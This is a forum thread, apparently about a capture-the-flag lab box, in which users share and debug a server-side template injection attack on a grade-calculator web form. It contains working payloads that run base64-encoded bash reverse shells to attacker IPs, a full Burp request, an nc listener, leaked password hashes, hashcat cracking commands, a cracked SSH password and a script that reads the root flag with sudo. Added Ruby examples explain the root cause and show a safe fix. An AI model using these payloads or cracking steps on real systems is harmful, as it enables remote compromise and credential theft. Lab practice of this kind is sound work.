Posts: 9
Threads: 0
Joined: Dec 2023
grade1=1&weight1=100&category2=N%2FA&grade2=1&weight2=0&category3=N%2FA&grade3=1&weight3=0&category4=N%2FA&grade4=1&weight4=0&category5=N%2FA&grade5=1&weight5=0&category1=a%0A<%25%3dsystem("echo+YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi41Ni8xMzM3IDA+JjEi+|+base64+-d+|+bash");%25>
not working
Posts: 28
Threads: 0
Joined: Jan 2024
I already have the user.txt flag
and I also got hashes from several users, but with hashcat or john I'm not able to break the hash
1|Susan Miller|abeb6f8eb5722b8ca3b45f6f72a0cf17c7028d62a15a30199347d9d74f39023f
2|Tina Smith|dd560928c97354e3c22972554c81901b74ad1b35f726a11654b78cd6fd8cec57
3|Harry Tyler|d33a689526d49d32a01986ef5a1a3d2afc0aaee48978f06139779904af7a6393
4|David Lawrence|ff7aedd2f4512ee1848a3e18f86c4450c1c76f5c6e27cd8b0dc05557b344b87a
5|Stephen Locke|154a38b253b4e08cba818ff65eb4413f20518655950b9a39964c18d7737d9bb8
If anyone can help, I appreciate it.
Posts: 28
Threads: 0
Joined: Jan 2024
(Mar 03, 2024, 08:34 PM)EnriQueHTB777 Wrote: (Mar 03, 2024, 08:14 PM)laranja Wrote: I already have the user.txt flag
and I also got hashes from several users, but with hashcat or john I'm not able to break the hash
If anyone can help, I appreciate it.
Use hashcat mask mode to break hashes
hashcat -m 1400 <hash/hash file> -a 3 <mask pattern>
In the mail (/var/mail/susan) you will see the pattern it follows, and here is some help to generate the pattern:
Built-in charsets
?l = abcdefghijklmnopqrstuvwxyz
?u = ABCDEFGHIJKLMNOPQRSTUVWXYZ
?d = 0123456789
?h = 0123456789abcdef
?H = 0123456789ABCDEF
?s = «space»!"#$%&'()*+,-./:;<=>?@[\]^_`{|}~
?a = ?l?u?d?s
?b = 0x00 - 0xff
Thank you, I already got root.txt
thank you all.
Posts: 3
Threads: 0
Joined: Feb 2024
(Mar 03, 2024, 07:21 PM)macsemose Wrote: grade1=1&weight1=100&category2=N%2FA&grade2=1&weight2=0&category3=N%2FA&grade3=1&weight3=0&category4=N%2FA&grade4=1&weight4=0&category5=N%2FA&grade5=1&weight5=0&category1=a%0A<%25%3dsystem("echo+YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNi41Ni8xMzM3IDA+JjEi+|+base64+-d+|+bash");%25>
not working
Try changing the +'s in your base64 statement to %2b. Like this:
YmFzaCAtYyAiYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xMC4xMC4xNi41Ni8xMzM3IDA%2bJjEi
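Why the %2b change matters, shown as an added Ruby example (not code from the thread): an application/x-www-form-urlencoded body decodes a literal '+' as a space, so any base64 that contains '+' is corrupted before base64 -d ever sees it, while %2b survives decoding. The field name and the base64 value are constructed for the demo.

```ruby
require "uri"
require "base64"

# Added example (not from the thread): how a form-urlencoded body treats '+'.
# The base64 value below is constructed: "+/+/" encodes the bytes FB FF BF.

# Decode a form body the way a web framework does and return one field.
def form_field(body, name)
  URI.decode_www_form(body).to_h[name]
end

# Base64-decode a field; returns nil when the decoder rejects the value.
def decode_b64_field(body, name)
  Base64.strict_decode64(form_field(body, name))
rescue ArgumentError
  nil
end

RAW_B64 = "+/+/"                                   # constructed sample value
NAIVE_BODY   = "category1=#{RAW_B64}"              # '+' left as-is in the body
ENCODED_BODY = "category1=#{URI.encode_www_form_component(RAW_B64)}" # '+' -> %2B

if __FILE__ == $0
  p form_field(NAIVE_BODY, "category1")              # => " / /"  ('+' became spaces)
  p decode_b64_field(NAIVE_BODY, "category1")        # => nil    (no longer valid base64)
  p form_field(ENCODED_BODY, "category1")            # => "+/+/"
  p decode_b64_field(ENCODED_BODY, "category1").bytes # => [251, 255, 191]
end
```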
Posts: 24
Threads: 1
Joined: Nov 2023
Mar 04, 2024, 06:00 AM
(Mar 04, 2024, 05:39 AM)balckroot Wrote: Python script that retrieves the user and root flags
import argparse
import paramiko
from colorama import init, Fore, Style

init(autoreset=True)


def ssh_connect(ip, command):
    """Open an SSH session as susan, run one command and return its stdout."""
    ssh = paramiko.SSHClient()
    ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
    # Perform SSH connection
    try:
        ssh.connect(ip, username='susan', password='susan_nasus_413759210')
        stdin, stdout, stderr = ssh.exec_command(command)
        output = stdout.read().decode().strip()
        return output
    except paramiko.AuthenticationException:
        return "Authentication failed."
    finally:
        ssh.close()


def main():
    parser = argparse.ArgumentParser(description='SSH into a target and execute commands.')
    parser.add_argument('-t', '--target-ip', dest='target_ip', required=True,
                        help='The IP address of the target machine.')
    args = parser.parse_args()
    # SSH connection and command execution
    user_flag = ssh_connect(args.target_ip, 'cat /home/susan/user.txt')
    root_flag = ssh_connect(args.target_ip, 'echo "susan_nasus_413759210" | sudo -S cat /root/root.txt')
    # Print colored output
    print(f"{Fore.YELLOW} ~~balckroot~~")
    print(f"{Fore.GREEN}[User-Flag]"f"{Fore.BLUE}[{user_flag}]")
    print(f"{Fore.RED}[Root-Flag]"f"{Fore.BLUE}[{root_flag}]")


if __name__ == '__main__':
    main()
Simple run, output:
~~balckroot~~
[User-Flag][<user-flag>]
[Root-Flag][<root-flag>]

AHAHAHAHA YOU'RE THE GOAT
But can you give the Burp Suite command? Because mine doesn't work, I'd like to know precisely how you did it. Thanks!!
grade1=1&weight1=100&category2=N%2FA&grade2=1&weight2=0&category3=N%2FA&grade3=1&weight3=0&category4=N%2FA&grade4=1&weight4=0&category5=N%2FA&grade5=1&weight5=0&category1=bash -c "bash -i >& /dev/tcp/10.10.14.45/1710 0>&1"
I turn intercept on, modify the request like above, forward ---> but it doesn't work
Posts: 7
Threads: 0
Joined: Jul 2023
What should appear after submitting? The page just reloads and nothing new happens
Posts: 23
Threads: 2
Joined: Feb 2024
ssh susan@10.10.11.253
susan_nasus_413759210
Posts: 24
Threads: 1
Joined: Nov 2023
(Mar 04, 2024, 07:11 AM)kiber Wrote: What should appear after submitting? The page just reloads and nothing new happens
After forwarding, nothing, just the calc page again and nothing else. Can you share your command?
Posts: 22
Threads: 5
Joined: Mar 2024
(Mar 02, 2024, 08:47 PM)DoesntMatter123456 Wrote: Thanks for the payload. I am trying this by changing the IP and port but still unable to get a reverse shell. Any idea what I could be doing wrong?
Check this out: https://youtu.be/cQlb4C8WUG4
Try another payload or use `python3 <payload>`. Make sure you URL-encode the payload.
Posts: 1
Threads: 0
Joined: Mar 2024
(Mar 02, 2024, 08:05 PM)jahman Wrote: You have to bypass a regex filter to execute SSTI RCE. You have to use the %0A char. Here is a payload:
category1=a///A77ss/e%0A;<%25%3d+system("echo IyEvYmluL2Jhc2gK
YmFzaCAgLWMgImJhc2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuMTIxLzIyMjIgMD4mMSIK | base64 -d | bash")+%25>+
Then you have to find susan's password hash in the /home/susan/Migration/pupilpath_credentials.db file:
strings /home/susan/Migration/pupilpath_credentials.db
The format of the password is in /var/spool/mail/susan. You can crack it with hashcat in mask mode:
hashcat -m 1400 h -a 3 susan_nasus_?d?d?d?d?d?d?d?d?d
I'm listening (ip vpn h7b): nc -lvnp 4444
My Burp request:
POST /weighted-grade-calc HTTP/1.1
Host: 10.129.217.20
Content-Length: 295
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.129.217.20
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.6167.160 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.129.217.20/weighted-grade
Accept-Encoding: gzip, deflate, br
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
grade1=12&weight1=12&category2=123&grade2=12&weight2=12&category3=khbj&grade3=12&weight3=12&category4=dfwdf&grade4=12&weight4=12&category5=sdfsd&grade5=12&weight5=0&category1=a%0A<%25%3dsystem("echo+YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40LzQ0NDQgMD4mMSI=+|+base64+-d+|+bash");%25>
But it doesn't work... WHYYYY???
Help me please
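Why a %0A in the category field slips past the filter, as an added Ruby example (not code from the thread or the box): assuming a Ruby/ERB application (the payload above uses <%= %>) whose check anchors with ^ and $, those anchors match at every line boundary in Ruby, so only the first line of the value is validated; \A and \z check the whole string, and rendering the value as data instead of template source removes the injection regardless of the regex. The pattern, the sample input and the function names are constructed for the demo.

```ruby
require "erb"

# Added example (not from the thread): the root cause behind the %0A trick.
# Assumption: a Ruby regex anchored with ^ and $ guards the category name.
VULNERABLE_PATTERN = /^[a-zA-Z0-9]+$/     # ^ and $ match per line in Ruby
HARDENED_PATTERN   = /\A[a-zA-Z0-9]+\z/   # \A and \z match the whole string

# Weak check: passes as soon as the first line looks clean.
def weak_category_ok?(value)
  value.match?(VULNERABLE_PATTERN)
end

# Strict check: the entire value, newlines included, must match.
def strict_category_ok?(value)
  value.match?(HARDENED_PATTERN)
end

# Unsafe rendering: the user value is spliced into the template *source*,
# so any <%= %> it carries is evaluated by ERB (this is the SSTI).
def render_unsafe(value)
  ERB.new("Category: #{value}").result(binding)
end

# Safe rendering: the value is data handed to a fixed template and escaped.
def render_safe(value)
  ERB.new("Category: <%= ERB::Util.html_escape(value) %>").result(binding)
end

# Constructed sample: a clean first line, a newline, then template syntax.
MULTILINE_INPUT = "a\n<%= 7 * 7 %>"

if __FILE__ == $0
  p weak_category_ok?(MULTILINE_INPUT)    # => true  (only "a" was checked)
  p strict_category_ok?(MULTILINE_INPUT)  # => false
  p render_unsafe(MULTILINE_INPUT)        # => "Category: a\n49"
  p render_safe(MULTILINE_INPUT)          # => "Category: a\n&lt;%= 7 * 7 %&gt;"
end
```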